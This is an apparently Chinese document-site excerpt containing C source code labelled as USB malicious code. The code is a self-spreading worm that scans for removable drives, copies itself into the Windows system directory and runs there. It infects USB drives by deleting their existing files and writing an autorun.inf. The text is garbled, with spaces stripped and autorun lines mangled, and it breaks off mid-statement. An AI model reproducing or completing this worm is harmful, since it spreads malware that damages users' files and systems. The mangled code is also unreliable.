文档介绍：一、[AutoRun]open=\open=打开(&O)shell\mand=\explore=我的资源管理器(&X)shell\\explore\\Command=:U盘恶意代码程序名称:#include""boolSaveToFile(char*Path,char*Data){HANDLEhFile;hFile=CreateFile(Path,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);if(hFile==INVALID_HANDLE_VALUE){/*continue;//出错时处理*/}DWORDdwWrite;WriteFile(hFile,Data,strlen(Data),&dwWrite,NULL);CloseHandle(hFile);returntrue;}BOOLInfectU(){while(true){UINTrevtype;charname[256]="H:\\";charszName[256]={0};chartoPath[256]={0};charinfPath[256]={0};charopenU[80]={0};//遍历所有盘符for(BYTEi=0x42;i<0x5B;i=i+0x01){name[0]=i;//得到盘符类型revtype=GetDriveType(name);//判断是否是可移动存储设备if(revtype==DRIVE_REMOVABLE){//得到自身文件路径GetModuleFileName(NULL,szName,256);//比较是否和U盘的盘符相同//如果相同说明在U盘上执行,复制到系统中去if(strncmp(name,szName,1)==0){//得到系统目录GetSystemDirectory(toPath,256);strcat(toPath,"\\");//把自身文件复制到系统目录if(CopyFile(szName,toPath,TRUE)){//运行程序WinExec(toPath,0);}strcpy(openU,"explorer");strcat(openU,name);//打开U盘WinExec(openU,1);return0;}//如果不是在U盘上执行,则感染U盘else{strcpy(toPath,name);strcat(toPath,"\\");strcpy(infPath,name);strcat(infPath,"\\");//还原U盘上的文件属性SetFileAttributes(toPath,FILE_ATTRIBUTE_NORMAL);SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL);//删除原有文件DeleteFile(toPath);DeleteFile(infPath);//*Data;Data="[AutoRun]\r